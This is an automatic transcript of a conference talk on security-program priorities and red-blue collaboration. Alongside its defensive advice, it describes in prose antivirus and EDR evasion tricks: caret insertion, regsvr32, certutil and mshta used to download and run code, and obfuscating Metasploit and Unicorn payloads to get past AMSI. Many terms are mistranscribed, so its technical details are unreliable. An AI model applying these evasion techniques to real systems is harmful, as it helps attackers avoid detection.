5 Things that Matter

Thanks well good afternoon test tests immunise of just a second here hang on sorry for everybody that I'm scratching on the wife sir good all right thank you all for coming to this afternoon to hear me talk about the five things that matter this talk for me is an important one because it's the five things that I typically see in most security programs where we have a lot of problems with and with my talks I like to keep them fairly high level and also super technical as well and balance both of those so I'll give you some nice bypass techniques for Windows Defender some other things throughout the talk and everything else but really this talk

kind of hits home to me because it's one of the things where when we go into a lot of companies we see a lot of different things appreciate the background it's been fun being in the cybersecurity space it's interesting I my dad just recently twittered I says my dad got to it it's been a literally interesting actually so I know a lot more about him that I thought I would ever know about my dad and and so one thing he did recently is a few years ago he spoke at derbycon and he let the whole world know that I was scared of clowns and it has not stopped since I get people sending me clowns all

day every day there's people threatening to hire clowns to come to the office like it's it's been a whole bunch thing but recently he just he just released my my report card from when I was a senior in high school which I had all apps except had 1b and was in typing and other then I filled out a high school and I graduated in summer school to go there and ice shortly join the Marines after that but it's been a great ride we never thought being able to talk in front of people was a thing or being able to do computers for a living was a thing so it's been a really awesome experience and I've gotten a lot of

great things to do for it so with that I'm gonna show you a quick video and this is one of my favorite things in life that I got I got actually got to be a part of kind of kind of I'm part of this segment but this is from mr. robot and in season 3 Elliott is basically getting fired from evil Corp and he's trying to evade the security guy folks so that he can stop the dark army from actually taking down evil Corp and so Elliott is basically trying to evade security and get around him you know here I'm throw a little little thing in here that I thought was really cool it's kind of cool when that they dropped her

name on a TV show that even worked with and helped and it's because I throughout this series and he look at the screens and in season 1 episode 5 when Elliott is hacking into steel mountain they use a social engineer toolkit to spoof a text message that allows them in the steel mountain and then season 3 episode 1 I think it was when Darlene lit the fire up and all the money that ran somewhere that they deployed they deployed through the social engineer toolkit so a lot of really neat things you get the experience and it really cool interesting up to have also been in a rap video never thought that would happen I was in a Chris Brown rap video

and it was really interesting I flew out to LA and it's a really interesting piece where he he basically reached out to our website the producer did and he's like hey can you can you can Dave advise us on this this rep you didn't know who was at the time and I'm like the only restriction is that Dave needs to be in the hacking video and needs actually be in the video so there are I'm in the back like hacking away and the old premise is that Chris Brown broke up with his girlfriend and he wants to delete all the pictures off of her phone so he hires his best friend Dave to come in and delete all the photos off of

there so I don't know this is really cheesy don't look it up at work by the way it's definitely not safe for work in any way shape or form but that was kind of a fun one too so so while we're here is that when we look at security we talk a lot about things that we that are our challenges right and we all have challenges I always like to make the the joke that we could fix security today and actually I can you can walk out here with the million dollar secret of fixing security today right now I'm gonna give it to you for free okay and that's if you have one dedicated person to

security for every single one employee that you have of your organization cuz you can just sit behind them and be like not don't click that link you just clicked it okay hang on grab the computer pass over the person next to you they reimagine you're all set right security would be fixed it solves all the issues that we deal with today soft furtive on the lifecycle you have a security person behind there like that's sequel injection you can't code it that way code it the other way okay got it got okay cool you know it literally fixed things as we see it think we don't have that luxury so a lot of us fit deal

with a lot of different things whether it's politics whether it's not enough funding or staff whether it's not having the the people to be able to support it there's a lot of things that that create challenges in our environment and so that's we're gonna be talking about today and still to this day I haven't found a piece of technologists replace me yet personally artificial intelligence has not replaced us as attackers or defense there's a lot of things coming kind of coming up from a marketing perspective that are kind of interesting so what are the top five things that matter to at least to me when it comes to scare might not be everybody but these are things

that I commonly see pretty much across the board before we start in that the basics here it's easy to say that everything's broken and and I don't think everything is broken in fact what I would say is that over the past ten years I've seen security go through a complete transformation where we've gotten better we're at a place now where you actually see defenders winning against the red team yeah we're at a time now where people are actually detecting attacks earlier on now it's not perfect in any way shape or form and I see something like Starwood and Marriott right where they had breaches for three or four years without detection again not perfect in any way

but we're getting better in a lot of cases that we're doing and I cannot say say being a red teamer and I'll talk about what that actual concept means because that's changed a lot over the past ten years but actually being a red teamer I can say it's substantially harder for me to break into companies substantially harder one little thing can totally set off an analyst and go into triage mode to figure out what was actually happening one of our testers recently was doing a was doing a red team engagement and we use so we use we have our own research and development team over a trusted SEC and they develop all those cool weaponize tools that we use we don't

disclose when you just use them for our customers for them to get better than anything else and it might be a debate about that or whatever I understand but we use this awesome amazing thing on this customer for Red Team got into environment bypassed all their EDR products got command and control infrastructure completely undetected it's perfect use a bunch of undocumented ways of getting a remote code execution on to the system things that haven't been discovered yet flew completely under the radar right and he might be like well why are you doing that first place all explained in just a second what was interesting is is about four minutes later we got detected four minutes using some really amazing

tradecraft that we had spent years of developing and we got detected in four minutes how did we get detected well what they had done in their environment which I thought was really unique is that they baseline people on two categories technical and non-technical and what they look for is anybody that would run command line arguments in this specific case we you looked at IP config to see what the network we were on harmless obvious it's not code execution in which shape or form but this person fell in a non technical category and typed in ipconfig boom nail right it's stuff like that that makes it really challenging for us as attackers to start to go into

environments we don't know where all the landmines are at and that was never the way five years ago by the way five years ago we can go in with Metasploit or on otto pone destroy a bunch of systems the only way they would know is if the system crashed right things have changed substantially over the past five to ten years to where we are a better industry and it's amazing to see all of the work that's gone into making that possible that's all to people that's all those other people in this room sitting here today making and making your organization's better every time of what you're doing and that's a huge testament to what we're starting to

see so what are some of the things that we see out there number one the basics the basics still kick our butts today you know we want to stop adversaries from breaking in using zero day exploits and we still have password one as our main password for all of our users right and that's a people problem right and in many cases there's a lot of things that we have to incorporate it to that but weak passwords pasture management two-factor authentication segmentation my god right segmentation is one of those things where we should have been doing a long time ago but we have to re our Kotak how we do business try doing that in a large

organization small organizations might might be a little bit easier but large organizations rer connecting and redesigning your entire infrastructure is a major thing probably one of the most effective ways that we get stopped as attackers is through application whitelisting by far today application whitelisting again by far the most effective control you can put into your environment today to stop most the stuff you see out there now don't get me wrong there's we've called living off the land binders and scripts and there's ways of circumventing those controls but guess what guess what 84% of the noise is today binaries and applications that are untrusted in your environment 84% what happens when you take that away you

don't have 84% anymore right so you know you have 16% to do the math right yeah okay thank God I always freak out about that with that one statistic I get the numbers wrong then you have 16% now you can focus on in your environment say hey these are the things that we can do differently to identify the noise in May and and monitor for deviations of patterns to be in your environment so again one of the most effective ways out there not easy is anybody ement application control and cross your entire environment in high integrity mode without any exceptions not happening right not happening but there are ways for us to at least get it

in there to do a bit better of a job some basics that I see blocking on-site executables and user profile directories as a start like basic right hey it's not a code signed application you know just block it in your user app data's and your downloads and everything else and don't allow it to execute in the first place guess what that does prob about 75% of that 84% you see out there today constrain language moon being able to implement so let me just get this out of the way do regular users the PowerShell hell as kids in your heck no heck no regular users do not need PowerShell right so why do why does every user need access the PowerShell

you could do that within Group Policy right if you have soft restriction policies you have app blocker and device guard right you can do that directly with the group policy to say hey if they're not part of these groups don't allow them to execute power shell and there's two locations by the way in PowerShell people almost for always always forget this you have C colon backslash Windows backslash this with their due back sash windows powershell backs s version 100 backslash powershell died exe and PowerShell underscore is seated exe okay those are your two main locations but you also have on sis while 64 which is amir windows directory windows backs last as well 64 back to us

windows powershell back to the first window back to the power saw the DX e and then powershell and square zdz those two locations are your two main culprits for what you want to lock down with those specifically so this thing long users for access powershell version 6 and above heavy logging everybody from the script lock logging there's anybody ever enable script lock logging did anybody crash servers when they did that they just Splunk licensing go up 10 million dollars yes right so script block logging is amazing it's also the most noisiest log that you're gonna have in your entire environment and i wish we lived in a world where money wasn't a problem like again one security person

to one employee when you enable constraint language mode there is stuff of microsoft's internals that you never want to see deployed in your environment from those powershell scripts man they do stuff wrong especially if your office 365 user or customers the amount of unsigned PowerShell code that is flying through your network is absolutely astonishing it's incredible and by the way if you ever want to fool a sock out by the way just take one of those scripts it's like they're like 700 pages long put your shell code injection in the middle of it cuz no one's ever gonna see it and just upload and you're all set cuz they're not code sign in the first

place it's still gonna create as Microsoft function and do all this stuff and it's also gonna get you remote code execution at the same time without being seen so apply on that one specifically also PowerShell version 6 and getting more four boats into logging what's interesting the PowerShell is it integrates into what's called the anti-malware scan interface which I'm going to show you an example here in a few a messiah is is is a great abstraction layer getting a little more clear of what actually is about to be executing on your system right before it hits the actual interpreter itself and so with a MSI there's what's called a messiah scan string and a MSS can buffer

and what you can do with PowerShell scripts specifically is scan those prior to it actually executing in your system which gives you a lot more verbosity now the issue with a MSI is it runs in user land mode so as a user you can disable it so there's a number of ways of defeating a Masai complete setting it down completely but what you'll see in a demonstration here is that even with a MSI detection you only have to modify things in just this tiny tiny tiny way to circumvent their complete detection criteria so it's still a really rudimentary way of detection but still good visibility if you're pulling that data back to look at that I'm a huge fan

of system on system on leverages what's called kernel level event log tracing for Windows etw it's a great way of getting more visibility into things that are happening in your environment without having to deal with crazy kernel drivers so system on is a great way to deploy your environment to see a lot of good stuff and Olaf has probably the most comprehensive system on configuration files what's great about system on is you can actually configure them to be alerts and alarms it does it's only central correlation essentially you can say and if this does that and ok that's good and then send this alarm back that specifically does something this is great for living off

land binaries and scripts and everything else please please please enable the Windows Firewall internally just that that's easy isn't it for users users not easy easy no easy little easy kind easy for regular users why does that matter workstation workstation communication is typically how we move for ladder movement so you enable the Windows Firewall basic concept and all of a sudden I can't pivot from Bob and IT to Bob and sales to Mary nighties computer you eliminated an attack surface that we we previously had that we wouldn't have necessarily if you had those just controls out there detections I will repeat this throughout this presentation this is one of the most important pieces out there but in order to do endpoint

detection and in order to do a detection at all you need to have endpoint locks I'll repeat that you need to have endpoint locks I know you're Splunk licensing goes up to ten million dollars but you need and I'm not a rep for lunk by the way either but you know whatever you have for your cinema your correlation engine if you using something like elasticsearch all you need a storage then right but you you leverage something like endpoints you have to have logs that's where most of your attacks service comes in through again obviously other things like east east and west traffic not just north and south when it comes to communications DNS logs script block Logging's grades

command line auditing another group policy feature right you turn that on you can see command line auditing as it's going on why is bob and sales executing an IP config some decent pieces their visibility first understanding specific tactics and procedures techniques and procedures that attackers using your environment from a detection standpoint what I see in most companies and what I do a thing called ions there's a thing called ask an expert which I apparently am pretending to be an expert and so when you're an expert the more the biggest calls that I get is how do I take my turist techniques and how do I run them in my environment how do I write the

Texans off of them that's gonna be our RC and then they call their ad that's my adversarial simulation programming I'm like okay we got a lot of discussion to talk about here okay so what happens with a lot of these techniques out there is that you're not focusing on the tactics or the procedures that the attackers wrappered by or even understanding your threat models around which groups are specifically focused on you as an organization and what ends up happening is you get a bunch of command line parsing tools do your writing specifically Texans for and to circumvent them is usually very trivial a good example is a tool that I wrote called magic unicorn which is a

PowerShell exploitation framework and one of the customers that we were working with will look for encoded command which if you're not familiar powershell coda command is the way to essentially get around what are called execution restriction policies and so within code of command you can cast something in Unicode and base64 encode it and your entire application would then run by running a code of command so a lot of people look for in coda command being run in their environment look for - e - en - en c - e C by the way which a lot of people don't know about so I wrote unicorn to basically convert encode a command back at the very end

but you never actually call encode of command the first place which circumvents all the detection criteria that's out there so again looking more at the behavior which we'll talk about here in a little bit becomes really important than the actual technique that was being leveraged in your environment I'd want to know every single time power saw communicating out to the Internet is that gonna generate a lot of false positives yep can I based on my environment yep but I get a lot less as time goes on yep do any people to do that yes so you know behavior becomes really really important in environments but you need the people to be able to really establish that and

use it and so my personal belief is that we purchase tools to try to fix poor security programs and let me let me talk about that for a second okay in this concept because if you are if you have a group that is already overworked right would you is anybody here not overworked does anybody just chill at their office they don't do anything they just chill got one that's pretty awesome I'm not not look one person just chill at the office and don't do anything you're not not dealing with meetings or fires would be great as if we could just focus our entire day on security but that never happens right we're dealing with a lot

of other things you got ITIL and change control we got to go to the cab meeting for something else and do this and that and then we have audits going on we're at the provide context and data to it oh hey there's a fire over here where the system's burning down was it our endpoint agent that did it you know there's all these different things that impact us on a day-in day-out and so when you take a piece of technology that you already have embedded in your environment you say this product is crap and you rip it out and you put a brand new piece of technology and what happens that next product and we just this crap

because it's how you're leveraging the tools and technology you don't have the resources to be able to leverage it in the same way you can anything else and like I hear all the time like our voters you know we're using Qualis raising nessus or using rapid7 or whatever you want to use it sucks I'm like well what's your process well we don't have a process okay let's let's talk about it's not the scanner that's your fault it's your program that you built surround it that is not working as anticipating to focus on that so usually when we purchase new tools we already have everything we need today in our environment typically you may be a

supplement a couple of things but we usually already have the technology today to do what we need to do yet we go we buy the latest and greatest because it's next-gen it's awesome so most organizations we see are still at the basic concept level they don't have a lot of the enhanced detection they're not focusing on simulations and a mediation to talk a little bit about here in a few minutes some are much further ahead than others there's a there's a company that we do work for it probably has one of the best security programs that I've ever seen and and I love to tell the story because it's where we just got annihilated to where

we look like a bunch of kids and and we don't like that feeling right when we're gonna and a red team engagement and you get in and they detecting you shut you out in every single way shape or form you possible you could have gotten into their environment and then the entire blue team is clapping and cheering on the phone Wow like can't we be trusted sack yeah you know it's like shooting you're like oh so we're like playing like playing like careless whispers in our slack channel and like like like eating popcorn and ice cream so to get over it and you know one thing we decided is hey that we don't never want

to have that happen again and so next time in round we destroyed them and we were clapping on the phone and then the next time around they destroyed us it's that back and forth that works really well right but the way that they do it is is they have an entire team that focuses on understanding their threats in their environment and building their program around that and then simulating that in these types of tests and simulations that we see out there so again some of these are great use examples of things that actually work in environments that we've seen and collaboration is one of the biggest pieces that I can't hit home enough about I'm gonna break down a the

concepts here and then insert this is in education or not a repeat of something that you've already already know but we talked about Blue Team and Red Team we talked about purple team purple teaming isn't a new concept purple team has been around since 2007 Lee says this as far back as I could find it a term usage of purple teaming and purple teaming isn't a new thing that we're trying to build on top of the security industry what purple teaming is is just collaboration between the red team and the blue team and what we used to do and I'll talk about this here in a little bit we used to go in we should just break everything

and you'd break everything you'd hand awesome report to your customer and you'd walk out like man I just destroyed this company they're totally screwed good luck and then next year to come back same thing just join him again they fixed all the technical findings they didn't fix the reason why those technical findings were there in the first place and so year after year after year after year it was read winning winning winning winning winning and it was read doing their mystique and their their amazing feats and they're a cool hacker stuff from their screens flying with you know green green green text everywhere with cool ASCII art have to have ask yarn or to be considered a hacker my opinion

it's also a prerequisite for any tools that we release a trusted second test it's actually in the tool release guide ASCII art and so any get judged on the ASCII art - so anyways but that wasn't the right way of doing things we weren't helping anybody by going in and destroying companies every time where companies really start to shine is when you have that collaboration between red and blue where instead of doing covert all the time to test the effectiveness of your instant response program you're doing over testing you're working with them as you're going through your simulations and you say listen here's the things that we're doing here's the things you can get better on here's the

things that you're just missing as far as detection you walk out of there completely different then hey here's a list of 10 findings at the pit patch you know specific systems for so that collaboration really becomes really really important I'm a huge believer on simulations and emulation I think tool releases are great there's a lot of debate right now and whether or not to release is do more harm than good whether researchers disclosing techniques do more harm than good I'm a huge advocate of giving tools to people that may not be able to develop those tools so they can test their own environment attackers are gonna do it why can't we have the same types of

tools out there yes they're gonna be used by adversaries colbalt strike by the way is used all the time by Russia all the time would you say that coal boat strikes a bad tool no we use it as testers all the time to test the effectiveness because we don't have a Mudge to be able to build that tool internally to our own capabilities and so we have to have the tools necessary to do our jobs as does any carpenter it has to do their jobs could a carpenter take one of his his devices and stab somebody with it absolutely when it comes to research we have to have that a conduit of getting better and working

better to to one goal of making things more secure without simulations red-and-blue don't understand each other so when I go through and I do a simulation of somebody my goal isn't to destroy them and it wasn't anymore I used to really like destroy people but but it used to be that way my goal is to make them better and what they're actually accomplishing and so simulations and working through these types of things make a big deal usually companies don't even have a foundation by the way we hear all the time hey we want a red team and we're like okay what does that mean to you like oh we want you this is just like completely

annihilate us and break into us so that we you know we know exactly where all of our weaknesses and our exposures are in our environment so that then we can patch them all and be secure I'm like that's not how any of this works by the way this is not a red team for you Brett's most most organizations that we deal with are not at a maturity level to deal with red team engagements almost 99% of them are not at a level that they even need red team's in their environment they don't even have basic forms of monitoring detection or even having endpoint logs in their environments what is a red team gonna do for them other than destroy them and

show them where they have faulty programs in there and that can be used as a wedge - so one thing I'll say is red and blue are better together and I'm a huge advocate of that I have become more blue and I still say I'm Red Team but my whole operation of thinking is all blue like if I'm gonna write something a tool a new technique or a tack vector how am I gonna stop that you know when I do something new or unique I make sure that it doesn't impact blue like by releasing a specific exploit you know to the wild to impact other organizations and companies I you seen everything about that I used to write

exploits all the time publish them up a mill arm like yeah I just got this awesome zero day here you go good luck you know vendor go go go patch it a little bit more refined now and times are a lot different by the way that was a badge of credibility you know earlier in you know and earlier in times of what exploits you can write and get around data execution prevention and stuff like that but again we talk about like we talked about the red team today like it was ten years ago we always say all the red team is not special I hear that all the time like the red team's not a

special group well yeah they are a special group there there they understand offensive capabilities within an organization you're not applying the red team the right way then you're right they're just sitting there destroying your environment and so the terminologies that we use around penetration testers by the way ten years ago right pentesters just come in they just destroy the organization and they walk out yeah I guess that still happens in environments but that's not exactly what we're designed to be doing in organizations that's room hacker by the way applies to both red and blue it's not just the red team that has hackers the blue team are hackers why aren't you hacking our stuff up to figure out how

to defend it aren't you writing awesome code to figure out ways to respond to us more effectively we're all hacking together and in this specific way and so the industry changed and this happened while ago it just takes a it takes a lot of terminologies fixes to do this people think that red team's repente ask people think that pentester vulnerability assessment people think I want to be assassins or red team's people think that physical assessments are you know social engineering which it can be a component of that so there's a lot of terminology issues that we face in this industry right now and a lot of it really is hey red team's more designed to understand your threat models towards

your organization and build your capabilities off of what the capabilities are of that organization and to be a little bit better that's it not not exponentially better but going to the level of what that organization is willing to actually accomplish you might see a theme here around sharing and collaboration but when we work together and understand things we get better research by the way sharing things and getting better tools doing different things that you're I thought some of these were great some this one was how to call PowerShell without ever calling PowerShell that came from Daniel Bohannon both of these came from Danny Bohannon over fire I and this was a specific one is it just run for files and basically

will eventually execute power shell with no exit on there and you could just launch PowerShell thought that a good ETR bypass by the way for all you folks this one down here I thought was really brilliant so it's very familiar with what we call living off the lamp miners and scripts is it me not familiar feel free raise your hand I okay got a couple explain it real quick so if you look at exploitation right our whole goal is to get code execution onto a system right we want to get code execution it's now granted we might have other objectives password stealing or things like that bypassing multi-factor authentication etc etc but with exploitation our whole

goal is to get code onto that system that we can then run to compromised that asset and then from there if do ransomware or move laterally across environments other systems primarily I gave a talk I think it was DEFCON 13 it was the very first ever PowerShell security talk and as you've talked to the folks at Microsoft they'll say that I was the first person ever to give a partial secure job which is really cool to say like you're kind of like the father of PowerShell security you know kind of kicking that thing was kind of neat it's called PowerShell oMFG and it was when PowerShell had first come out and it was it was in every

operating system yet it was Windows Vista at the time and they were looking at making an optional requirement in Windows Vista but they had come out and announced him that any further operating systems would have PowerShell embedded into it so I just had to take a look at it was one of my good friends Josh Kelly and we're like wow this is really powerful you can do a lot of great stuff with and I said listen you know giving a full-fledged programming language onto a Windows environment aside from vbscript and others is gonna be pretty damaging I think to security especially with no logging anything else it's gonna be a big deal and it's can be

one of the main fronts of attack and lo and behold Power Cells become a major front of it now one thing I'll say about Microsoft is that Lee homes literally the catalyst for security in PowerShell that he deserves everything that he gets in more in raids I'm sure he literally got everything that is currently in PowerShell with a constraint language mode with logging and verbosity in there you have in their script lock logging all the security features that we now know instead of PowerShell you all just have to kind of update your stuff from PowerShell version 2 up to PowerShell version 6 or above anyways so that's that's PowerShell well with the way we used to hack about ten years ago is we

would look for things like Java right which had a lot of major issues in it or Adobe which had a lot of major issues in it or office products which would have a lot of still have a lot of major issues in and so you'd have these products and we say well we know that a user probably has these products in their system so we know that it's there it's the same thing with living off the land binders and scripts and this is why it's so kind of damaging this is it circumvents application whitelisting your application control is that microsoft ships with binaries across the operating system that allow it to work right you have Calcutta XE for example right it's

code signed by Microsoft you know it has a specific function that it produces well all their binaries in the Windows operating system have additional functionality built in as well I'm like for my my favorite ones and I'll show you a demonstration of this is reg SBR 32 it's under the system 32 directory and registry or 32 has a /i parameter that allows you to go in down those put tags directly from the internet and run it without any type of detection whatsoever so you can go and download code roughly from internet execute automatically without any type of detection so using a code sign Microsoft Windows binary to then go and download code directly off the Internet and

execute it in an authorized State there's about 77 of these binaries in Windows I do it MSH GA CBD THC CSC THC Matt have been checked there's a whole bunch of these right even BG info the background info that you use to show the IP address this has remote code execution functionality into it so you know there's a lot of different things that are codes I'm at Microsoft that give you full capabilities now let me show you a little little demonstration here really quick power this back up again sorry about that so this is a fully updated version of if it comes back up I hope they got it does it'll come up take a second here it goes oh my

god or not there it goes all right so I got a fully up-to-date version of Windows 10 and and this is an example of what registry are 32 would look like as an attacker okay you give it a slash eyes / and in the slash is the most important and we're gonna go to trust tech comm as an example okay and so here we're just gonna go and download a script object it could be whatever extension type you want - doesn't have to be XML or txt or SCP or anything like that can be whatever you want to cuz you imagine hosting something like github and it's just a github project and it says readme dot txt does your defenders

gonna see that and so this is this will basically create a script logic and execute this code for us now interesting enough Microsoft knows that this is bad right so I'm running the latest version of Windows Defender if you notice here it was less updated for the 24 so four days ago okay so it's about four days all wish you know hey I didn't hook up to the Internet today I apologize but if I run this what happens ooh got snagged by antivirus right it must be a really good detection I'm sure let's take a look at this what if I throw carrot into here wait hang on hang on Oh too good okay what if I throw another carrot here Oh

still denied what if I throw three carrots this the screen to go away oh we get through Thank You Rance my demo I'm Dave Kennedy this is what we're dealing with today when it comes to detection and prevention and this is a clear-cut case of what we seen edr products to by the way edr products looking for that /i throw one care in there let's get seen throw two carrots three carrots are good sounds good another couple funny ones on throwing legitimate words into your your code take a dictionary and just have variable substitutions in there of dictionary words because it makes it look more predictable from an analysis perspective that it's legitimate because you're

using legitimate dictionary words not coding language stuff there's so many different tricks that we have out there but it's super trivial is this make me an elite hacker by the way Yeah right I just bypassed Windows Defender I gotten rated number one in the antivirus category and this year and whatever the heck magazine that was right number one got around it right three carrots so you know with with living off land binaries and scripts that's a whole nother attack surface that we have available to us and you know when I was gonna get to this one is that this one was found in the wild which I would ask does anybody here actually would anybody here actually

detect this and I'd like to see a honest answer don't be like my miner detection program is the best I would all right listen to what it's doing first okay it's going out and it's using cert you till okay every from a cert util import-export certificates there's a - ping option where you can download code directly from the internet with Suri tool why that was ever a feature right don't know but hey it's cool right you can download code record an Internet in any context and you certain till for it fine sounds good now here's a crazy detection they download the power show code directly through circuit still and then execute it with PowerShell never calling out with PowerShell at all

in the first place pretty awesome where'd you detect that no one looking for sir utility key not to the internet we looking for you have to do that from command prompt well that one's command C but you don't need to you don't need to run from command prompt oh by the way as an attacker I can't member last time I'm actually dropped into a command prompt by the way we know you all look for us drug-running cmd.exe but that's a good one eye or leverage a completely in PowerShell so

that's that's the good way of doing it right more than that behavior of understanding applications that haven't beacon down the first place and then from there going there totally agree yep a couple II agree baselining your environment sounds like a marvelous counter so without what by way without talking about this most the folks in here defenders probably would have known that you could do that right there are ways with three carrots they get around Windows Defender right or there are ways with cert util to go and do this or you know one of my favorites is MSHDA tied exe most folks know about HDI files so HCA files are high content HTML files and what's what's damaging about them is

you can run them in a browser and they have any browser execute them so they basically you can hit open and do anything you want to there and so with with HT a files most people block HTA's at the firewall right so they don't allow those to actually actually execute but MSHDA that exe is a phenomenal resource you can point m sh TI DXE to any website you want to again download the code and execute it directly for you they have me me cats running off of em SCH ta ta whatever you want to running off of MSHDA without an issue so again a lot of issues that that with microsoft code signing applications that give us

code execution functionality but it comes into sharing you wouldn't know about that if you weren't here today your blue team probably would know about unless you tested it out on their red team your thread hunters wouldn't have known about unless they've seen in the wild before all of those pieces of knowledge coming together to work together collaborate work really really well number four behavior focus on and Jeff Moss nailed this on the head was last year at black head before he introduced the keynote and Jeff Moss said as an industry we are focusing solely on a techniques and we have no idea what the tactics and procedures of attackers are any spot on 100% right mitre attack is a great

example minor attack is a great phenomenal resource this is don't get me wrong it's great a walk through a lot of techniques allows you to do some simulations in your environment but it is not a cheat sheet for detection not what it was designed for if you're trying to do whack-a-mole detections off of the technique section of miter your programs probably missing a substantial amount of gaps when it comes to attacking and I would say it's probably pretty easy to circumvent your detection criteria so we are focused on the techniques not tactics or procedures so once we realize that we can start to look at what that means to switch more to the tactics and procedures behaviors

and behavior is a loosely level term across this entire industry but again a behavior why is Mary in sales using PowerShell in the first place that's a good baseline that's a good behavior right why is red Jessica r32 bikini on to the internet when it has it before in our while in the wild ever before in the past those are great behaviors in your environment things that you can count on to look for things again is it gonna generate false positive absolutely can't we minimize those false positives in baseline environment sure you know do we need people to do that yes I already said that earlier today so those are some of the things that we'd

be focused on a good example of a behavior as I was going into a company doing a threat hunting exercise and it was one of those engagements where the first minute you sit down like I got it I got him I got a good one and it was an exchange server running as a system account on exchange sure which also happen to be a DC it wasn't exposed to Internet thank God that was one interesting piece about there but it's also DC and the best part about it was they had a PowerShell script that was going every every night at 2:00 o'clock in the morning going to China and downloading a binary directly into memory through PowerShell right non code

sign all other good stuff right and I'm like I sit then I see this attack and I'm like I just made my money for this one I'm good I got a PT in here you know I got some I got some hackers you know we're gonna dive into this everything's fine not like you know go to the customer I'm like hey I hate to be the bearer bad but you're breech like really bad like domain controllers and command and control and also their stuff and it's like oh my gosh and it starts bringing up this instant response team we start looking at it and it turns out they have a third-party marketing company does metrics offer the exchanged

performance it's out of China that downloads unquote signed binaries at two o'clock in the morning apparently and it's perfectly legitimate that's fine IDC hey HCP as well which is even better you know it's like it's like literally every step of the way right and it's like they're using attacker techniques or code is IP skated you're leveraging and voc expression to go and download code record from Internet all great stuff right so these are things that we typically see an environment where like hey I found something that's a behavior I'd want to know that that behaviors there but I can baseline and look for other things in our environment right so visibility becomes critical I'm going to

show you an example here in just a second of getting around visibility or a lot of the traditional protection mechanisms that we have but protection takes time and and the biggest piece that you can walk away out here with is that while protection takes time we can augment things with detection to get better and faster what we're doing a good example is when that DD OTO came out a couple years ago right I mean remember that DD OTO came out as a way to get remote code execution if Excel files about macros right and so with that Microsoft said at the time they work in a patch they eventually end up doing it based on the damage and crits

here it had with DD auto it was being used in the wild within seven hours seven hours we saw ransomware campaigns hitting it could you implement changes in your environment within seven hours across your entire organization probably not right but can we detect certain things in our environment than seven hours probably we're getting the right sources of information right so again detection becomes much faster much more nimble we still focus on protection because we're not giving up on that we still need to focus on those detection pieces and being faster some quick brief statistics this is over binary defense we analyzed a bunch of code code execution samples and what we found is that 82 percent I said 84 I apologize I

got this that wrong I did get the numbers wrong being it 82% are executables so still to this day a choose executables 13% is PowerShell 4% is living off the land by owners and scripts so living off the lands very small number the one that most companies are probably trying to focus the most on when they're not even getting PowerShell logs not focusing on allowing executables in their user directories and again our priorities become completely skewed and different

lets customer data aggregated our EDR pieces for it and then we and our sim pieces for correct things that actually made it ten points yep some breakout time frames on average it took about an hour and a half almost two hours to break out of a specific system so when a machine becomes compromised what happens from there you know how do they move out and spray laterally across the environments about an hour and a half so us as defenders we have about an hour and a half time frame to respond to that specific incident and then go from there right here's the thing if an attacker customizes anything anything at all they typically go undetected and what I mean

by by that is our reliance on tools and technology those tools themselves typically go on notice now where I get busted it's not from a tool I get bust it is from people and so every time I go into an organization we already know how to get past the CDR product and this antivirus product and this specific protection mechanism you know exactly what we're doing when we get tripped up it's by people doing creative things we're looking at unusual behavior customized stuff works take a technique modify it anyway again to the three carrots versus two carrots throwing seven carats thrown done carrots you can highly a piece key attend carrots I'm telling you I am

you'll read the code at that boy oh you know what to do with time carrots that's some G stuff right there build your own bait detection for sure right a good example of this is I wrote a tool in 2011 note started 2013 and it was a simple command and control infrastructure that uses HTTP and an advanced encryption standard to communicate over and was a bike compiled Python program okay and it was downloaded over a million times the trusted second what it would do is it wash a shell over HTTP or https over AES and allow you to communicate back and forth I uploaded the virus soldiers to kind of take a look at how it get

attacked because you know unquote signed binary malicious is all hack been downloaded a million times in the wild and three out of the 67 or so actually detected as malicious which I thought was pretty amazing um so again you have to customize anything just use what was already a available out there to me today just kind of obscure let's do a demonstration real quick now I'm gonna show you a video and I'm gonna do it live so here's an example of let me get the play button if I can find my mouse again no I'm uh supposed to have sound on that hang on

there we go okay so we're gonna run unicorn and now I'm gonna do is I'm you something out of the box meterpreter Metasploit okay and Metasploit is very commoditized would you see a lot of folks use it so you know if you just take it out the box it'll get detected by antivirus or something else we're gonna have a call back to 172 16 2 2 1 at 171 up 43 we're gonna go ahead and just decode it really quick you'll see the code here in a second I'm just gonna decode the values here ly fast and I'm gonna get the raw code that's gonna be executing the system and what's gonna be seen by a Messire the anti-malware scan

interface run it here's the code it's obfuscated and of course now we're gonna go and paste this over to the powershell interpreter over here on the right hand side we're also gonna start a listener for Metasploit as well at the same time so that we have something to catch our shell in the event that were successful so over here you can see we have our partial interpreter and we're gonna run MSF console and over here gonna hit play oh no it's kind of blurry buddy but we got stopped by a Maasai the anti-malware scan interface blocked us and it's it's a virus what we're gonna do here it's really quick is we're gonna take a look

and say whoa I wonder what part of the code is actually getting detected by antivirus okay let's go and run that so I just cut that out and I hit play well ok it doesn't get picked up and apart so the last line of my code is getting picked up by in averse so man must be a really good detection I'm sure what if I create a variable let's copy that line and paste it it can't be that easy yep it is so so funny story Bob does you get your shot anything else is great right funny story about this one specifically is that unicorn went for years undetected years and years and years and make something to get more

popular and they started writing antivirus signatures for okay and it became a battle between Microsoft and myself I'm sure I have horrible horrible names being called on me over there any great folks are there by the way I love everything they're doing in there getting better but when the funny parts was is that they started writing signatures for defender every single week so I got upset and one week I decided I'm like you know what I'm gonna spend a week and write a program that does all this for me automatically and so what it would do is it would go and check out the latest defender signatures it would check to see if it got hit by

antivirus if it got hit by antivirus it automatically rewrite the code for me I wrote a PowerShell interpreter for Python in it it would rewrite for me it would do had integrated into get lab checks so we've built and passed make sure I got a shell back and everything I oughta made my whole framework and it'll automatically do a pull request for me to see whether or not it got past it so within about 30 seconds of a new signature being released I already had a bypass already up on github I'm gonna need it so that went out for like two months and they finally gave up this is pretty good feel bad for the folks out

writing that by the way I mean that is suck so here's a version I'll show you a funny thing here some quirks sometimes it works sometimes it doesn't but let me show you an example here you got me running the latest and greatest I got a listener up here right now I'm sure my IP didn't change over the course of talking here which has happened before go ahead play we're gonna run our code out of unicorn I notice here I got a virus threat protection found right got busted whatever is if I hit play again it works no dia just to prove that I'm not not crazy here we're on that box so so just run your coat twice and you're

fine I don't understand what's going on here anymore you could also circumvent this by if you do something like couple examples so I run this code here this is the decoded code you just take these this dis Bob here which is all your shellcode and just replace it with instead of using like symbols you just replace it with numeric values like like five five five five five it also circumvents all the detection rights here up there as well again really hard stuff okay to do makes me lose sleep at night Oh another funny quirk about that I was testing unicorn one time and I'd run a command and then run another command and then it was for

